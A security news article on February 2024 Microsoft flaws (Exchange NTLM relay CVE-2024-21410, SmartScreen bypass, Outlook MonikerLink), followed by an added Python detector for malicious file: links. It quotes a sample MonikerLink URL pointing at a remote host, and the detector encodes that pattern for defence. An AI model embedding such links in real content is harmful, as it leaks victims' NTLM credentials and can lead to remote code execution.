
Critical Exchange Server Flaw (CVE-2024-21410) Under Active Exploitation

Microsoft on Wednesday acknowledged that a newly disclosed critical security flaw in Exchange Server has been actively exploited in the wild, a day after it released fixes for the vulnerability as part of its Patch Tuesday updates.

Tracked as CVE-2024-21410 (CVSS score: 9.8), the issue has been described as a case of privilege escalation impacting Exchange Server.

“An attacker could target an NTLM client such as Outlook with an NTLM credentials-leaking type vulnerability,” the company said in an advisory published this week.

“The leaked credentials can then be relayed against the Exchange server to gain privileges as the victim client and to perform operations on the Exchange server on the victim’s behalf.”

Successful exploitation of the flaw could permit an attacker to relay a user’s leaked Net-NTLMv2 hash against a susceptible Exchange Server and authenticate as the user, Redmond added.

The tech giant, in an update to its bulletin, revised its Exploitability Assessment to “Exploitation Detected,” noting that it has now enabled Extended Protection for Authentication (EPA) by default with the Exchange Server 2019 Cumulative Update 14 (CU14) update.


Details about the nature of the exploitation and the identity of the threat actors that may be abusing the flaw are currently unknown. However, Russian state-affiliated hacking crews such as APT28 (aka Forest Blizzard) have a history of exploiting flaws in Microsoft Outlook to stage NTLM relay attacks.

Earlier this month, Trend Micro implicated the adversary in NTLM relay attacks targeting high-value entities at least since April 2022. The intrusions targeted organizations dealing with foreign affairs, energy, defense, and transportation, as well as those involved with labor, social welfare, finance, parenthood, and local city councils.


CVE-2024-21410 adds to two other Windows flaws – CVE-2024-21351 (CVSS score: 7.6) and CVE-2024-21412 (CVSS score: 8.1) – that have been patched by Microsoft this week and actively weaponized in real-world attacks.

The exploitation of CVE-2024-21412, a bug that enables a bypass of Windows SmartScreen protections, has been attributed to an advanced persistent threat dubbed Water Hydra (aka DarkCasino), which has previously leveraged zero-days in WinRAR to deploy the DarkMe trojan.


“The group used internet shortcuts disguised as a JPEG image that, when selected by the user, allows the threat actor to exploit CVE-2024-21412,” Trend Micro said. “The group can then bypass Microsoft Defender SmartScreen and fully compromise the Windows host as part of its attack chain.”

Microsoft’s Patch Tuesday update also addresses CVE-2024-21413, another critical shortcoming affecting the Outlook email software that could result in remote code execution by trivially circumventing security measures such as Protected View.

Codenamed MonikerLink by Check Point, the issue “allows for a wide and serious impact, varying from leaking of local NTLM credential information to arbitrary code execution.”

The vulnerability stems from the incorrect parsing of “file://” hyperlinks when an exclamation mark is added to URLs pointing to arbitrary payloads hosted on attacker-controlled servers (e.g., “file:///\\10.10.111.111\test\test.rtf!something”).

“The bug not only allows the leaking of the local NTLM information, but it may also allow remote code execution and more as an attack vector,” the cybersecurity firm said. “It could also bypass the Office Protected View when it’s used as an attack vector to target other Office applications.”
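For defenders, the link shape described above can be screened for in message bodies before delivery. The following is an added example, not code from Microsoft, Check Point or the original article: a heuristic that lists every `file:` hyperlink in an HTML body and flags those that point at a remote host and carry a `!` suffix after the file extension. The function names and the sample HTML are assumptions constructed for illustration; legitimate links to internal file shares will also appear in the findings, which is why only the combination is treated as high risk.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# A '!' directly after a file extension marks the moniker part of the link.
MONIKER = re.compile(r"\.[A-Za-z0-9]{1,8}!(.*)$")

class _HrefCollector(HTMLParser):
    """Collects the href value of every <a> tag in an HTML body."""
    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.hrefs += [v for k, v in attrs if k == "href" and v]

def find_file_links(html_body):
    """Return one finding per file: link, with remote host and moniker suffix."""
    collector = _HrefCollector()
    collector.feed(html_body)
    findings = []
    for href in collector.hrefs:
        url = unquote(href).strip()            # decode %21 and similar first
        if not url.lower().startswith("file:"):
            continue
        rest = url[5:].replace("\\", "/")      # treat UNC backslashes as slashes
        path = rest.lstrip("/")
        slashes = len(rest) - len(path)
        # file://host/... and file:///\\host\... are remote; file:///C:/... is local
        remote = slashes == 2 or slashes >= 4
        match = MONIKER.search(path)
        host = path.split("/", 1)[0] if remote else None
        findings.append({"href": href, "host": host,
                         "moniker": match.group(1) if match else None})
    return findings

def high_risk(findings):
    """Remote file: links that also carry a '!' suffix, the pattern described above."""
    return [f for f in findings if f["host"] and f["moniker"] is not None]

# Constructed sample body; the last link is the example quoted in the article.
SAMPLE_HTML = r'''
<a href="https://intranet.example/wiki">wiki</a>
<a href="file:///C:/Users/a/report.docx">local</a>
<a href="file://fs.example/share/doc.rtf">share</a>
<a href="file:///\\10.10.111.111\test\test.rtf!something">invoice</a>
'''
```

Calling `high_risk(find_file_links(SAMPLE_HTML))` returns only the last link; the patch for CVE-2024-21413 remains the fix, and a filter like this is a stopgap for unpatched clients.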
